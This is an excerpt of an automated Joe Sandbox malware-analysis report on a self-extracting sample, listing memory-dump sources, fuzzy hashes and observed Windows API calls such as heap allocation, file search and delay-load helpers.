• Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
• Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
• Opcode ID: abed1cffc514613976da7f9e4e2c4a99f2643eefd9814034490df0aecc0af336
• Instruction ID: db7f6d9c3f385ac81b0bf5ecb1ccdab9be622274af07af1fa3ea6ddeec1f48b2
• Opcode Fuzzy Hash: abed1cffc514613976da7f9e4e2c4a99f2643eefd9814034490df0aecc0af336
• Instruction Fuzzy Hash: E8413AB0905B40DEE724DF798889AE6FBE5BF29300F50492ED5FE87282CB756654CB10
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 0073B098
  • Part of subcall function 007213DC: __EH_prolog.LIBCMT ref: 007213E1
Memory Dump Source
• Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
• Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
• Opcode ID: d3c94d4f48a01ba3db05e6b93154f1cd19979db7db2cbb54d986cc2b48343c94
• Instruction ID: f2195bb828fe8b2ea82a809d70679526c7a4aa0e698cad56240c6d1306bdc8d9
• Opcode Fuzzy Hash: d3c94d4f48a01ba3db05e6b93154f1cd19979db7db2cbb54d986cc2b48343c94
• Instruction Fuzzy Hash: 12319E71C00259DADF15DF64D855AEEBBB4AF19300F5044AEE409B3242D779AF04CB61
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetProcAddress.KERNEL32(00000000,?), ref: 0074ACF8
Memory Dump Source
• Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
• Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
Similarity
• API ID: AddressProc
• String ID:
• API String ID: 190572456-0
• Opcode ID: 97c4724bc64c193d23198ec98cd5ddc2944f1748fc3fa595c1099496600009d1
• Instruction ID: 1345c6250d9fee23df933212a0fdbfba1fa5235bdc7c76e2c28e0bfce3efe5dc
• Opcode Fuzzy Hash: 97c4724bc64c193d23198ec98cd5ddc2944f1748fc3fa595c1099496600009d1
• Instruction Fuzzy Hash: F311CA33B40625BF9B259F28DC9099A7395EB8436171A8520FD15AB298DB38DD018BE2
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog.LIBCMT ref: 0072CE45
  • Part of subcall function 00725E37: __EH_prolog.LIBCMT ref: 00725E3C
Memory Dump Source
• Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
• Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
• Opcode ID: 1c58f78c3537fcea649f411b7033894026d20ed36ea5107722bf078d6209edcc
• Instruction ID: c327d65058cebc1cf9e283d4340559b4f3bf802326779a77646bc6ebf21e66d9
• Opcode Fuzzy Hash: 1c58f78c3537fcea649f411b7033894026d20ed36ea5107722bf078d6209edcc
• Instruction Fuzzy Hash: 5E11A3B1A00354DEEB16DB79D509BAEB7E89F54300F14046DE446D3282DB785F04CB62
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
• Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
• Opcode ID: fe89e3260542cda57e5efbdc10422130a09d87aadc1c3bb41e63df4b58faf4e6
• Instruction ID: 8e0d87010a66ee6d2e4e84a7e2982be8684e39c9a78e285c6f09310a376ac642
• Opcode Fuzzy Hash: fe89e3260542cda57e5efbdc10422130a09d87aadc1c3bb41e63df4b58faf4e6
• Instruction Fuzzy Hash: 04018233900538EBCF26EBA8DC869DEB775FF88740F054125E912B7152DA38CD14C6A0
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0074B136: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00749813,00000001,00000364,?,00743F73,00000050,?,00761030,00000200), ref: 0074B177
• _free.LIBCMT ref: 0074C4E5
Memory Dump Source
• Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
• Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
Similarity
• API ID: AllocateHeap_free
• String ID:
• API String ID: 614378929-0
• Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
• Instruction ID: 349474441d809b23eae72f7768b31798753720e24c4e15b8a5b28c00019568f2
• Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
• Instruction Fuzzy Hash: 7C014972200345ABE3318F69C88596AFBECFB85330F25052DE184832C1EB34A805C774
Uniqueness
Uniqueness Score: -1.00%

APIs
• RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00749813,00000001,00000364,?,00743F73,00000050,?,00761030,00000200), ref: 0074B177
Memory Dump Source
• Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
• Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 0b79ec3cf191a2f86296faee576d29a9cc35fccec3a504a14671c67922f90b78
• Instruction ID: 5c4180f35686233cfb0499b650afed762215a3dab5c57551a3d8cf4527a29f90
• Opcode Fuzzy Hash: 0b79ec3cf191a2f86296faee576d29a9cc35fccec3a504a14671c67922f90b78
• Instruction Fuzzy Hash: 9FF0E93264512CB7DB215B35AC19B9F3748AF41770B198111FC0897190DB2CDD0182E1
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetProcAddress.KERNEL32(00000000,?), ref: 00743C3F
Memory Dump Source
• Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
• Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
Similarity
• API ID: AddressProc
• String ID:
• API String ID: 190572456-0
• Opcode ID: e5a24f1f116383bad74cffdbc9cb244dbfea8cd4572de7929fc94cb958ba1fee
• Instruction ID: 77c60563b323183ffd2bf31ad363e4a5a393295e218996c0181634a678b7c6ca
• Opcode Fuzzy Hash: e5a24f1f116383bad74cffdbc9cb244dbfea8cd4572de7929fc94cb958ba1fee
• Instruction Fuzzy Hash: 8FF0EC362003169FDF114E68EC4499A7799EF01B617104125FE1DE71D0DB35EA20C7E0
Uniqueness
Uniqueness Score: -1.00%

APIs
• RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0074CA2C,00000000,?,00746CBE,?,00000008,?,007491E0,?,?,?), ref: 00748E38
Memory Dump Source
• Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
• Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 819bd5a456fc27f8128ab358645ed0537c142d4678b07e4499d94c74c7380152
• Instruction ID: 7d0e8fd4f42fdcbc3c3c5028e8097820cf0fcc4eb74f6c428113469b6c17734e
• Opcode Fuzzy Hash: 819bd5a456fc27f8128ab358645ed0537c142d4678b07e4499d94c74c7380152
• Instruction Fuzzy Hash: 17E06D3124623DA7EAF126759C09B9F76489F41BA8F2A4161BC1996091DF6DCC0182E7
Uniqueness
Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00725AC2
                                                                                                • Part of subcall function 0072B505: __EH_prolog.LIBCMT ref: 0072B50A
Memory Dump Source
• Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
• Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
Uniqueness
• Uniqueness Score: -1.00%
APIs
• FindCloseChangeNotification.KERNELBASE(000000FF,?,?,007295D6,?,?,?,?,?,00752641,000000FF), ref: 0072963B
Similarity
• API ID: ChangeCloseFindNotification
• String ID:
• API String ID: 2591292051-0
Uniqueness
• Uniqueness Score: -1.00%
APIs
  • Part of subcall function 0072A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0072A592,000000FF,?,?), ref: 0072A6C4
  • Part of subcall function 0072A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0072A592,000000FF,?,?), ref: 0072A6F2
  • Part of subcall function 0072A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0072A592,000000FF,?,?), ref: 0072A6FE
• FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0072A598
Similarity
• API ID: Find$FileFirst$CloseErrorLast
• String ID:
• API String ID: 1464966427-0
Uniqueness
• Uniqueness Score: -1.00%
APIs
• SetThreadExecutionState.KERNEL32(00000001), ref: 00730E3D
Similarity
• API ID: ExecutionStateThread
• String ID:
• API String ID: 2211380416-0
Uniqueness
• Uniqueness Score: -1.00%
APIs
• GdipAlloc.GDIPLUS(00000010), ref: 0073A62C
  • Part of subcall function 0073A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0073A3DA
Similarity
• API ID: Gdip$AllocBitmapCreateFromStream
• String ID:
• API String ID: 1915507550-0
Uniqueness
• Uniqueness Score: -1.00%
APIs
• SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00731B3E), ref: 0073DD92
  • Part of subcall function 0073B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0073B579
  • Part of subcall function 0073B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0073B58A
  • Part of subcall function 0073B568: IsDialogMessageW.USER32(000104AA,?), ref: 0073B59E
  • Part of subcall function 0073B568: TranslateMessage.USER32(?), ref: 0073B5AC
  • Part of subcall function 0073B568: DispatchMessageW.USER32(?), ref: 0073B5B6
Similarity
• API ID: Message$DialogDispatchItemPeekSendTranslate
• String ID:
• API String ID: 897784432-0
Uniqueness
• Uniqueness Score: -1.00%
APIs
• DloadProtectSection.DELAYIMP ref: 0073E5E3
Similarity
• API ID: DloadProtectSection
• String ID:
• API String ID: 2203082970-0
Uniqueness
• Uniqueness Score: -1.00%
APIs
• GetFileType.KERNELBASE(000000FF,007297BE), ref: 007298C8
Similarity
• API ID: FileType
• String ID:
• API String ID: 3081899298-0
Uniqueness
• Uniqueness Score: -1.00%
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0073E3FC
  • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
  • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
Uniqueness
• Uniqueness Score: -1.00%
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0073E3FC
  • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
  • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E3FC
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E3FC
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E3FC
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E3FC
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E3FC
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E3FC
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E3FC
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,0073AE72,C:\Users\user\AppData\Local\Temp\RarSFX1,00000000,0076946A,00000006), ref: 0073AC08
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
